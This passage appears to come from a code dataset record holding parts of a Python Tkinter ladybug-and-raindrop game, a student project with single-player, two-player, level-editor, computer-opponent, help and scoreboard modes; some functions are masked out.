bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\ndef levelCreatedRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n if data.powerUpsEditor == True:\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data.\n levelEditorLives, font='Arial 20 bold', fill='yellow')\n canvas.create_text(data.width / 2, 660, text=\n \"\"\"You lose a life for hitting a drop\n & don't get eaten!\"\"\",\n font='Arial 15 bold', fill='yellow')\n if data.levelEditorLives <= 0:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold',
            fill='yellow')
    if data.level > 1:
        winEditor(canvas, data)
    drawHome(canvas, data)


def winEditor(canvas, data):
    """Draw the full-screen win overlay for the level-editor mode."""
    canvas.create_rectangle(0, 0, data.width, data.height, fill='black')
    canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)
    canvas.create_image(300, 320, image=data.winBug)
    canvas.create_text(data.width / 2, 100, text='You Made it!', font=
        'Arial 23 bold', fill='yellow')


<mask token>


def drawDifficulties(canvas, data):
    """Draw the Easy/Medium/Hard buttons and the Enter button.

    The Enter image is swapped to the clickable graphic (data.click) once a
    difficulty has been chosen; until then it stays in its initial state.
    """
    canvas.create_text(data.medX, data.AITY, text='Computer Difficulty:',
        font='Arial 23 bold', fill='yellow')
    canvas.create_image(data.easyX, data.easyY, image=data.slow)
    canvas.create_text(data.easyX, data.easyY, text='Easy')
    canvas.create_image(data.medX, data.easyY, image=data.medium)
    canvas.create_text(data.medX, data.easyY, text='Medium')
    canvas.create_image(data.hardX, data.easyY, image=data.fast)
    canvas.create_text(data.hardX, data.easyY, text='Hard')
    if data.difficulty != None:
        data.enter = data.click
    canvas.create_image(data.medX, data.enterY, image=data.enter)
    canvas.create_text(data.medX, data.enterY, text='Enter')


def difficultyMousePressed(event, data):
    """Handle clicks on the difficulty screen: home, then the three buttons.

    Selecting a button stores the matching difficulty value and highlights
    only that button (the other two revert to the unclicked image).
    """
    checkHome(event, data)
    if data.easyY - data.r <= event.y <= data.easyY + data.r:
        if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:
            data.difficulty = data.difS
            data.slow = data.click
            data.medium, data.fast = data.notClick, data.notClick
        if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:
            data.difficulty = data.difM
            data.medium = data.click
            data.slow, data.fast = data.notClick, data.notClick
        if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:
            data.difficulty = data.difH
            data.fast = data.click
            data.slow, data.medium = data.notClick, data.notClick
    if data.enter == data.click:
        if data.enterY - data.r <= event.y <= data.enterY + data.r:
            if data.medX - 2 * data.r <= event.x <= 
data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if (data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\ndef AISwitchBug(data, distance):\n for scaryBug in data.scaryBug:\n if (data.player1Y - data.r - scaryBug.y <= distance and data.\n switchOnProgress == False):\n if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data\n .player1X + data.r):\n return True\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 
== 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n addPowerUpsAI(data)\n\n\ndef addExtraCoconut(data):\n if data.time % 18 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(755, 0))\n if data.time % 37 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = 
random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\ndef AIKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n if data.winner == None:\n if event.keysym == 'Left' and data.onLeft1 == False:\n data.onLeft1 = True\n data.player2X = 550\n elif event.keysym == 'Right' and data.onLeft1 == True:\n data.onLeft1 = False\n data.player2X = 750\n\n\ndef AIMousePressed(event, data):\n checkHome(event, data)\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\ndef powerUpAITimerFired(data):\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if 
abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef AIRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconutsAI1:\n coconut.draw(canvas)\n for coconut in data.coconutsAI2:\n coconut.draw(canvas)\n canvas.create_text(50, 40, text='Computer', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 1', font='Arial 15 bold', fill\n ='yellow')\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n AIWinner(canvas, data)\n drawHome(canvas, data)\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! 
You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\ndef helpKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\n<mask token>\n\n\ndef helpTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n 
canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n", "step-5": "#Arushi Patel (aruship)\r\nfrom tkinter import *\r\nimport random\r\n\r\n######################################\r\n#images taken from wikipedia,pixabay,\r\n#trans americas, clipartpanda,pngimg,\r\n#findicons, microsoft word\r\n######################################\r\n\r\n####################################\r\n# init\r\n####################################\r\ndef init(data):\r\n data.score =0\r\n data.mode = \"splashScreen\"\r\n data.timerDelay = 100\r\n data.height = 800\r\n data.width = 800\r\n data.speed = 10\r\n data.speedAI = 12\r\n data.speedAI2 = 12\r\n data.switchOnProgress = False\r\n data.r = 25\r\n data.cx= 280\r\n data.cy=750\r\n data.onLeft1, data.onLeft2 = True, True\r\n data.win= False\r\n data.coconuts = []\r\n data.powerUps = []\r\n data.coconuts1 = []\r\n data.coconuts2 = []\r\n data.coconutsAI1 =[]\r\n data.coconutsAI2 = []\r\n data.invincible = []\r\n data.pauseDrops = False\r\n data.pause1Drop = False\r\n data.pause2Drop = False\r\n init1(data)\r\n\r\ndef init1(data):\r\n data.beInvincible = False\r\n data.Invincible1 = False\r\n data.Invincible2 = False\r\n data.scaryBug = []\r\n data.time = 0\r\n data.coconutFall = False\r\n data.sides = [\"r\", \"l\"]\r\n data.level = 1\r\n data.splashScreenTime = 0\r\n data.splashScreenDrops = []\r\n data.background= PhotoImage(file=\"tree.gif\")\r\n data.deadScreen = PhotoImage(file = \"deadBug.gif\")\r\n data.ladyBug = PhotoImage(file = \"lady.gif\")\r\n 
data.winScreen= PhotoImage(file = \"treeTop1.gif\")\r\n data.winBug = PhotoImage(file = \"littleBug.gif\")\r\n data.halfBackground = PhotoImage(file = \"halfTree.gif\")\r\n data.umbrella = PhotoImage(file = \"umbrella2.gif\")\r\n data.spider = PhotoImage(file = \"spider.gif\")\r\n data.hourGlass = PhotoImage(file = \"hourGlass.gif\")\r\n data.splashScreen = PhotoImage(file = \"splash.gif\")\r\n init2(data)\r\n\r\ndef init2(data):\r\n data.tbg= PhotoImage(file = \"tbg2.gif\")\r\n data.click = PhotoImage(file = \"click.gif\")\r\n data.notClick = PhotoImage(file = \"notClick.gif\")\r\n data.player1X = 150\r\n data.player1Y = 750\r\n data.player2X = 550\r\n data.player2Y = 750\r\n data.winner = None\r\n data.speed = 12\r\n data.speed2 = 12\r\n data.editorTime = 0\r\n data.editorDrops = []\r\n data.margin = 100\r\n data.enter = False\r\n data.powerUpsEditor = None\r\n data.yourSpeed = None\r\n data.rainSpeed = None\r\n data.slow= data.notClick\r\n data.medium = data.notClick\r\n data.fast = data.notClick\r\n data.drizzle = data.notClick\r\n data.rain =data.notClick\r\n data.thunderstorm = data.notClick\r\n init3(data)\r\n\r\ndef init3(data):\r\n data.yes = data.notClick\r\n data.no = data.notClick\r\n data.enter = data.notClick\r\n data.levelEditorLives =2\r\n data.rSpeed = None\r\n data.start = None\r\n data.start1 = None\r\n data.start2 = None\r\n data.difficulty = None\r\n data.mode1 = data.notClick\r\n data.mode2 = data.notClick\r\n data.mode3 = data.notClick\r\n data.mode4 = data.notClick\r\n data.mode5 = data.notClick\r\n data.mode6 = data.notClick\r\n data.home = PhotoImage(file = \"home.gif\")\r\n data.helpScreen = PhotoImage(file = \"help1.gif\")\r\n data.title = PhotoImage(file = \"title.gif\")\r\n data.scoreList = []\r\n data.spotList = [270,364,458,552, 646, 740]\r\n data.savedScores = readFile(\"score.txt\")\r\n if data.mode == \"levelCreated\":\r\n setEverything(data)\r\n initsplashScreenNumbers(data)\r\n\r\ndef initsplashScreenNumbers(data):\r\n 
data.splashButtonY = 425\r\n data.p1ButtonX= 225\r\n data.p2ButtonX = 290\r\n data.edButton = 355\r\n data.diffButton = 425\r\n data.helpButton = 490\r\n data.sboardButton = 555\r\n data.hitPenalty = 75\r\n data.splashText = data.height/2-20\r\n data.lives = 2\r\n data.levelMax = 8\r\n data.lane = 94\r\n data.Player1Min= 270\r\n data.Player1Max = 740\r\n data.homeX =50\r\n data.homeY = 650\r\n initScoreBoardHelp(data)\r\n init1Player(data)\r\n\r\ndef initScoreBoardHelp(data):\r\n data.tbgY=5*data.height/12\r\n data.txtTScore = 150\r\n data.S_P = 220\r\n data.numScores = 5\r\n data.scorePos = data.height/10\r\n data.scoreShift = 270\r\n data.helpY = data.height/2-20\r\n data.name = \"\"\r\n data.printName = \"\"\r\n data.hit = False\r\n initAI(data)\r\n\r\ndef init1Player(data):\r\n data.buffer = 40\r\n\r\ndef initAI(data):\r\n data.AITY = 225\r\n data.easyX = 200\r\n data.easyY = 300\r\n data.medX =400\r\n data.hardX = 600\r\n data.enterY = 450\r\n data.difS = 4\r\n data.difM = 6\r\n data.difH = 8\r\n data.last = 500\r\n data.enterX = 575\r\n data.PUT = 450\r\n data.RST = 350\r\n data.YST = 250\r\n####################################\r\n# mode dispatcher\r\n####################################\r\n\r\ndef mousePressed(event, data):\r\n if (data.mode == \"splashScreen\"): splashScreenMousePressed(event, data)\r\n elif (data.mode == \"1Player\"): playerMousePressed(event, data)\r\n elif (data.mode == \"2Player\"): twoPlayerMousePressed(event, data)\r\n elif (data.mode == \"editor\"): editorMousePressed(event,data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedMousePressed(event,data)\r\n elif (data.mode == \"AI\"): AIMousePressed(event, data)\r\n elif (data.mode == \"difficulty\"): difficultyMousePressed(event, data)\r\n elif (data.mode == \"scoreboard\"): scoreboardMousePressed(event, data)\r\n elif (data.mode == \"help\"): helpMousePressed(event, data)\r\n\r\ndef keyPressed(event, data):\r\n if (data.mode == \"splashScreen\"): splashKeyPressed(event, 
data)\r\n elif (data.mode == \"1Player\"):playerKeyPressed(event, data)\r\n elif (data.mode == \"2Player\"):twoPlayerKeyPressed(event, data)\r\n elif (data.mode == \"editor\"): editorKeyPressed(event, data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedKeyPressed(event,data)\r\n elif (data.mode == \"AI\"): AIKeyPressed(event, data)\r\n elif (data.mode == \"difficulty\"): difficultyKeyPressed(event, data)\r\n elif (data.mode == \"scoreboard\"): scoreboardKeyPressed(event, data)\r\n elif (data.mode == \"help\"): helpKeyPressed(event, data)\r\n \r\ndef timerFired(data):\r\n if (data.mode == \"splashScreen\"): splashScreenTimerFired(data)\r\n elif (data.mode == \"1Player\"):playerTimerFired(data)\r\n elif (data.mode == \"2Player\"):twoPlayerTimerFired(data)\r\n elif (data.mode == \"editor\"): editorTimerFired(data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedTimerFired(data)\r\n elif (data.mode == \"AI\"): AITimerFired(data)\r\n elif (data.mode == \"difficulty\"): difficultyTimerFired(data)\r\n elif (data.mode == \"scoreboard\"): scoreboardTimerFired(data)\r\n elif (data.mode == \"help\"): helpTimerFired(data)\r\n\r\ndef redrawAll(canvas, data):\r\n if (data.mode == \"splashScreen\"): splashScreenRedrawAll(canvas, data)\r\n elif (data.mode == \"1Player\"):playerRedrawAll(canvas, data)\r\n elif (data.mode == \"2Player\"):twoPlayerRedrawAll(canvas, data)\r\n elif (data.mode == \"editor\"): editorRedrawAll(canvas, data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedRedrawAll(canvas,data)\r\n elif (data.mode == \"AI\"): AIRedrawAll(canvas, data)\r\n elif (data.mode == \"difficulty\"): difficultyRedrawAll(canvas, data)\r\n elif (data.mode == \"scoreboard\"): scoreboardRedrawAll(canvas, data)\r\n elif (data.mode == \"help\"): helpRedrawAll(canvas, data)\r\n\r\n####################################\r\n# splashScreen mode\r\n####################################\r\ndef splashScreenMousePressed(event, data):\r\n #checks for selection of mode\r\n if 
data.splashButtonY-2*data.r <= event.x <=data.splashButtonY+2*data.r:\r\n if data.p1ButtonX-data.r<=event.y<=data.p1ButtonX+data.r:\r\n data.mode = \"1Player\"\r\n if data.p2ButtonX-data.r<=event.y<=data.p2ButtonX+data.r:\r\n data.mode = \"2Player\"\r\n if data.edButton-data.r<=event.y<=data.edButton+data.r:\r\n data.mode = \"editor\"\r\n if data.diffButton-data.r<=event.y<=data.diffButton+data.r:\r\n data.mode = \"difficulty\"\r\n if data.helpButton-data.r<=event.y<=data.helpButton+data.r:\r\n data.mode = \"help\"\r\n if data.sboardButton-data.r<=event.y<=data.sboardButton+data.r:\r\n data.mode = \"scoreboard\"\r\n\r\ndef splashKeyPressed(event, data):\r\n pass\r\n\r\n\r\ndef splashScreenTimerFired(data):\r\n data.splashScreenTime += 1\r\n if data.splashScreenTime %2 ==1:\r\n rainDropSplash(data)\r\n for drop in data.splashScreenDrops:\r\n drop.onTimerFired(data)\r\n\r\ndef splashScreenButtons(canvas, data):\r\n canvas.create_image(data.splashButtonY,data.p1ButtonX,image = data.mode1)\r\n canvas.create_image(data.splashButtonY,data.p2ButtonX,image = data.mode2)\r\n canvas.create_image(data.splashButtonY,data.edButton,image = data.mode3)\r\n canvas.create_image(data.splashButtonY,data.diffButton,image = data.mode4)\r\n canvas.create_image(data.splashButtonY,data.helpButton,image = data.mode5)\r\n canvas.create_image(data.splashButtonY,data.sboardButton,image =data.mode6)\r\n \r\ndef rainDropSplash(data):\r\n xPosition = random.randint(0,800)\r\n data.splashScreenDrops.append(Coconuts(xPosition,0))\r\n\r\ndef splashScreenRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.splashText-10, image=data.title)\r\n for drop in data.splashScreenDrops: drop.draw(canvas)\r\n canvas.create_text(data.width/2, data.splashText, text=\"\"\"\r\n 1.) Single Player Level Mode\r\n\r\n\r\n 2.) Two-Player Mode\r\n\r\n \r\n 3.) Level Creator Practice Mode\r\n\r\n \r\n 4.) Play Against the Computer\r\n\r\n \r\n 5.) Help and Instructions\r\n\r\n \r\n 6.) 
Scoreboard\r\n\r\n \r\n \"\"\", font=\"Arial 14 bold\", fill = \"yellow\")\r\n splashScreenButtons(canvas, data)\r\n\r\n####################################\r\n# taken from class notes\r\n####################################\r\n\r\ndef writeFile(path, contents):\r\n with open(path, \"wt\") as f:\r\n f.write(contents)\r\n\r\ndef readFile(path):\r\n with open(path, \"rt\") as f:\r\n return f.read()\r\n\r\n####################################\r\n# 1Player mode\r\n####################################\r\n\r\n\r\n#Coconuts (from Mario game) represent the water drops\r\nclass Coconuts(object):\r\n def __init__(self,x,y):\r\n self.x = x\r\n self.y = y\r\n self.r = 9\r\n self.fill = \"deep sky blue\"\r\n self.speed = 30\r\n self.outline= \"blue\"\r\n\r\n def draw(self, canvas):\r\n canvas.create_polygon(self.x,self.y- 2*self.r,\r\n self.x-self.r, self.y,\r\n self.x, self.y + self.r,\r\n self.x+self.r, self.y, fill = self.fill,\r\n outline = self.outline, width = 3)\r\n\r\n def onTimerFired(self, data):\r\n # downward falling motion\r\n self.y += self.speed\r\n \r\ndef hit(data):\r\n #checks for hitting rain\r\n for coconut in data.coconuts:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if coconut.y>=data.cy-data.r and coconut.y<=data.cy+data.r:\r\n if coconut.x>=data.cx-data.r and coconut.x<=data.cx+data.r:\r\n data.cy+=data.hitPenalty\r\n if data.mode == \"levelCreated\":\r\n data.lives-=1\r\n elif data.hit ==False and data.level<data.levelMax:\r\n data.score -=data.level\r\n data.coconuts.remove(coconut)\r\n if data.mode == \"levelCreated\":\r\n data.levelEditorLives-=1\r\n\r\n \r\ndef hit2Player(data):\r\n if data.mode == \"2Player\":\r\n if data.Invincible1 == False:\r\n #only when powerup isn't active\r\n for coconut in data.coconuts1:\r\n if coconut.y>=data.player1Y-data.r \\\r\n and coconut.y<=data.player1Y+data.r:\r\n if coconut.x>=data.player1X-data.r and \\\r\n coconut.x<=data.player1X+data.r:\r\n data.player1Y+=data.hitPenalty \r\n 
data.coconuts1.remove(coconut)\r\n if data.Invincible2 == False:\r\n #only when powerup isn't active\r\n for coconut in data.coconuts2:\r\n if coconut.y>=data.player2Y-data.r and \\\r\n coconut.y<=data.player2Y+data.r:\r\n if coconut.x>=data.player2X-data.r and \\\r\n coconut.x<=data.player2X+data.r:\r\n data.player2Y+=data.hitPenalty \r\n data.coconuts2.remove(coconut)\r\n\r\n\r\nclass PowerUps(Coconuts):\r\n def __init__(self,x,y):\r\n super().__init__(x, y)\r\n\r\n def draw(self, canvas, data):\r\n canvas.create_image(self.x, self.y, image=data.hourGlass)\r\n \r\ndef hitPause(data):\r\n # checks if hits hour-glass & pauses with flag\r\n for powerUp in data.powerUps:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:\r\n if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r:\r\n data.pauseDrops = True\r\n data.start = data.cy\r\n data.powerUps.remove(powerUp)\r\n elif data.mode == \"2Player\" or data.mode == \"AI\":\r\n if powerUp.y>=data.player1Y-data.r and \\\r\n powerUp.y<=data.player1Y+data.r:\r\n if powerUp.x>=data.player1X-data.r and \\\r\n powerUp.x<=data.player1X+data.r:\r\n data.pause1Drop = True\r\n data.start1 = data.player1Y\r\n data.powerUps.remove(powerUp)\r\n if powerUp.y>=data.player2Y-data.r and \\\r\n powerUp.y<=data.player2Y+data.r:\r\n if powerUp.x>=data.player2X-data.r and \\\r\n powerUp.x<=data.player2X+data.r:\r\n data.pause2Drop = True\r\n data.start2 = data.player2Y\r\n data.powerUps.remove(powerUp)\r\n \r\n\r\nclass Invincible(PowerUps):\r\n def __init__(self,x,y):\r\n super().__init__(x, y)\r\n \r\n def draw(self, canvas, data):\r\n canvas.create_image(self.x, self.y, image=data.umbrella)\r\n\r\ndef hitInvincible(data):\r\n #checks if hits umbrella powerup\r\n for powerUp in data.invincible:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:\r\n if powerUp.x>=data.cx-data.r 
and powerUp.x<=data.cx+data.r:\r\n data.beInvincible = True\r\n data.start = data.cy\r\n data.invincible.remove(powerUp)\r\n if data.mode == \"2Player\" or data.mode == \"AI\":\r\n #for player1\r\n if powerUp.y>=data.player1Y-data.r and \\\r\n powerUp.y<=data.player1Y+data.r:\r\n if powerUp.x>=data.player1X-data.r and \\\r\n powerUp.x<=data.player1X+data.r:\r\n data.Invincible1=True\r\n data.start1 = data.player1Y\r\n data.invincible.remove(powerUp)\r\n # for player 2\r\n if powerUp.y>=data.player2Y-data.r and \\\r\n powerUp.y<=data.player2Y+data.r:\r\n if powerUp.x>=data.player2X-data.r and \\\r\n powerUp.x<=data.player2X+data.r:\r\n data.Invincible2=True\r\n data.start2 = data.player2Y\r\n data.invincible.remove(powerUp)\r\n \r\nclass ScaryBug(object):\r\n def __init__(self,x,y):\r\n self.x = x\r\n self.y = y\r\n self.speed = 25\r\n\r\n def draw(self, canvas, data):\r\n canvas.create_image(self.x, self.y, image=data.spider)\r\n\r\n def onTimerFired(self, data):\r\n if data.mode ==\"2Player\" or data.mode == \"AI\":\r\n self.speed = 35\r\n self.y -= self.speed\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\" and\\\r\n data.time %8 ==0:\r\n #makes spider dynamically move\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if self.x -data.lane >=data.Player1Min:self.x-=data.lane\r\n else: self.x+=data.lane\r\n elif side == \"r\":\r\n if self.x+data.lane<= data.Player1Max:self.x +=data.lane\r\n else: self.x -=data.lane\r\n \r\n \r\n \r\ndef hitScaryBug(data):\r\n # checks for automatic death by spider\r\n for bug in data.scaryBug:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if bug.y>=data.cy-1.5*data.r and bug.y<=data.cy+1.5*data.r:\r\n if bug.x>=data.cx-1.5*data.r and bug.x<=data.cx+1.5*data.r:\r\n data.hit = True\r\n data.lives = 0\r\n data.levelEditorLives = 0\r\n if data.mode == \"2Player\" or data.mode == \"AI\":\r\n if bug.y>=data.player1Y-data.r and bug.y<=data.player1Y+data.r:\r\n if 
